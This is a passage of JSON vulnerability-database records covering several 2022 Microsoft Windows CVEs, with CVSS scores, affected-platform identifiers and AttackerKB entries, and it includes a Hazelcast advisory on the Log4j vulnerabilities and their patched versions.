"CVE-2021-45105"], "modified": "2022-01-05T05:13:47", "id": "THN:933FE23273AB5250B949633A337D44E1", "href": 
"https://thehackernews.com/2022/01/microsoft-warns-of-continued-attacks.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-01-10T22:21:29", "description": "Windows CSRSS Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-22047, CVE-2022-22049.", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-12T07:00:00", "type": "mscve", "title": "Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22026", "CVE-2022-22047", "CVE-2022-22049"], "modified": "2022-07-12T07:00:00", "id": "MS:CVE-2022-22026", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22026", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-10T22:21:25", "description": "Windows CSRSS Elevation of Privilege Vulnerability. 
This CVE ID is unique from CVE-2022-22026, CVE-2022-22049.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T07:00:00", "type": "mscve", "title": "Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22026", "CVE-2022-22047", "CVE-2022-22049"], "modified": "2022-07-12T07:00:00", "id": "MS:CVE-2022-22047", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22047", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-10T22:21:25", "description": "Windows CSRSS Elevation of Privilege Vulnerability. 
This CVE ID is unique from CVE-2022-22026, CVE-2022-22047.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T07:00:00", "type": "mscve", "title": "Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22026", "CVE-2022-22047", "CVE-2022-22049"], "modified": "2022-07-12T07:00:00", "id": "MS:CVE-2022-22049", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22049", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-10T22:21:06", "description": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability. 
This CVE ID is unique from CVE-2022-35743.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-09T07:00:00", "type": "mscve", "title": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190", "CVE-2022-34713", "CVE-2022-35743"], "modified": "2022-08-10T07:00:00", "id": "MS:CVE-2022-34713", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34713", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-10T22:21:26", "description": "Windows Print Spooler Elevation of Privilege Vulnerability. 
This CVE ID is unique from CVE-2022-22022, CVE-2022-30206, CVE-2022-30226.", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-12T07:00:00", "type": "mscve", "title": "Windows Print Spooler Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22022", "CVE-2022-22041", "CVE-2022-30206", "CVE-2022-30226"], "modified": "2022-09-20T07:00:00", "id": "MS:CVE-2022-22041", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22041", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-01-10T22:21:31", "description": "Windows Print Spooler Elevation of Privilege Vulnerability. 
This CVE ID is unique from CVE-2022-22022, CVE-2022-22041, CVE-2022-30206.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-07-12T07:00:00", "type": "mscve", "title": "Windows Print Spooler Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22022", "CVE-2022-22041", "CVE-2022-30206", "CVE-2022-30226"], "modified": "2022-07-12T07:00:00", "id": "MS:CVE-2022-30226", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30226", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-01-10T22:21:30", "description": "Windows Print Spooler Elevation of Privilege Vulnerability. 
This CVE ID is unique from CVE-2022-22041, CVE-2022-30206, CVE-2022-30226.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-07-12T07:00:00", "type": "mscve", "title": "Windows Print Spooler Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22022", "CVE-2022-22041", "CVE-2022-30206", "CVE-2022-30226"], "modified": "2022-07-12T07:00:00", "id": "MS:CVE-2022-22022", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22022", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-01-10T22:21:35", "description": "Windows Print Spooler Elevation of Privilege Vulnerability. 
This CVE ID is unique from CVE-2022-22022, CVE-2022-22041, CVE-2022-30226.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T07:00:00", "type": "mscve", "title": "Windows Print Spooler Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22022", "CVE-2022-22041", "CVE-2022-30206", "CVE-2022-30226"], "modified": "2022-07-12T07:00:00", "id": "MS:CVE-2022-30206", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30206", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-03T16:21:53", "description": "Windows Network File System Remote Code Execution Vulnerability. 
This CVE ID is unique from CVE-2022-22029.", "edition": 1, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T07:00:00", "type": "mscve", "title": "Windows Network File System Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22039", "CVE-2022-22029"], "modified": "2022-07-12T07:00:00", "id": "MS:CVE-2022-22039", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22039", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-11-01T12:13:23", "description": "Windows Network File System Remote Code Execution Vulnerability. 
"cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_11:-"], "id": "CVE-2022-35803", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-35803", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:azure:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-09-30T20:45:40", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability. 
This CVE ID is unique from CVE-2022-35803.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-13T19:15:00", "type": "cve", "title": "CVE-2022-37969", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-35803", "CVE-2022-37969"], "modified": "2022-09-30T19:15:00", "cpe": ["cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:21h2"], "id": "CVE-2022-37969", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-37969", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", 
"cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:azure:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:rt:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2022-10-08T22:25:53", "description": "Windows CSRSS Elevation of Privilege Vulnerability. 
This CVE ID is unique from CVE-2022-22026, CVE-2022-22047.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-12T00:00:00", "type": "attackerkb", "title": "CVE-2022-22049", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22026", "CVE-2022-22047", "CVE-2022-22049"], "modified": "2022-07-12T00:00:00", "id": "AKB:5FAD5EC2-E77A-4F4A-B3DC-61A700F1B059", "href": "https://attackerkb.com/topics/fIVjvZJTUN/cve-2022-22049", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-23T08:04:25", "description": "Windows CSRSS Elevation of Privilege Vulnerability. 
This CVE ID is unique from CVE-2022-22026, CVE-2022-22049.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-12T00:00:00", "type": "attackerkb", "title": "CVE-2022-22047", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22026", "CVE-2022-22047", "CVE-2022-22049"], "modified": "2022-07-12T00:00:00", "id": "AKB:0B6E13D5-84E0-4D3E-BD21-781032FA30ED", "href": "https://attackerkb.com/topics/SzYymWZIy5/cve-2022-22047", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-31T14:39:22", "description": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability. 
This CVE ID is unique from CVE-2022-35743.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "attackerkb", "title": "CVE-2022-34713", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-34713", "CVE-2022-35743"], "modified": "2022-08-09T00:00:00", "id": "AKB:06DA4012-8C8E-4534-A099-AE4F2449F9B3", "href": "https://attackerkb.com/topics/B3Zx5VDSPc/cve-2022-34713", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-04T05:01:18", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability. 
This CVE ID is unique from CVE-2022-35803.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-13T00:00:00", "type": "attackerkb", "title": "CVE-2022-37969", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-35803", "CVE-2022-37969"], "modified": "2022-09-13T00:00:00", "id": "AKB:48AB1318-D726-4F76-9889-74353FF980EF", "href": "https://attackerkb.com/topics/ZMtSR5b70g/cve-2022-37969", "cvss": {"score": 0.0, "vector": "NONE"}}], "github": [{"lastseen": "2023-01-11T05:06:26", "description": "### Impact\nA highly critical 0-day exploit (CVE-2021-44228) is found in Apache log4j 2 library on December 9, 2021.\n\nThis affects Apache log4j versions from 2.0-beta9 to 2.14.1 (inclusive). \n\nThis vulnerability allows a remote attacker to execute code on the server if the system logs an attacker-controlled string value with the attacker's JNDI LDAP server lookup.\n\nAnother vulnerability related to the same library, which was discovered on 12/14/2021 (CVE-2021-45046) and revealed another Remote Code Execution vulnerability, has been investigated by Hazelcast team as well and it is found that it does not affect Hazelcast Products under default configurations. \n\nThe finding of CVE-2021-45105 on 12/14/2021, which can cause a Denial of Service attack, was investigated by Hazelcast team and it is confirmed that it does not affect Hazelcast Products under default configurations. 
\n\nThe finding of CVE-2021-44832 on 12/28/2021, which is a medium vulnerability, is investigated by our security team as well, and not considered to be as critical. It requires attacker to be able to modify logging configuration, which means attacker can modify the filesystem and/or can already execute arbitrary code which is more of a general security breach rather than something log4j specific.\n\nNote that Hazelcast IMDG and IMDG Enterprise itself is not affected.\n\nHowever, given version distributions are considered to be vulnerable since related ZIP and TGZ distributions contain a vulnerable Hazelcast Management Center version.\n\n### Patches\nCVE-2021-44228 is fixed in log4j 2.15.0.\nCVE-2021-45046 is fixed in log4j 2.16.0.\nCVE-2021-45105 is fixed in log4j 2.17.0.\nCVE-2021-44832 is fixed in log4j 2.17.1.\n\nAs of 12/21/2021, Hazelcast team has released a new version of all affected products that upgrades log4j to 2.17.0 as listed below: \nHazelcast Management Center 4.2021.12-1, Hazelcast Management Center 5.0.4.\nHazelcast IMDG and IMDG Enterprise 4.0.5, 4.1.8 and 4.2.4.\nHazelcast Jet 4.5.3.\nHazelcast Platform 5.0.2.\n\nAs of 01/06/2022, Hazelcast Management Center 4.2022.01 with the updated log4j 2.17.1 is released. log4j2.17.1 will be included in Management Center 5.1 that is expected to be released in February. 
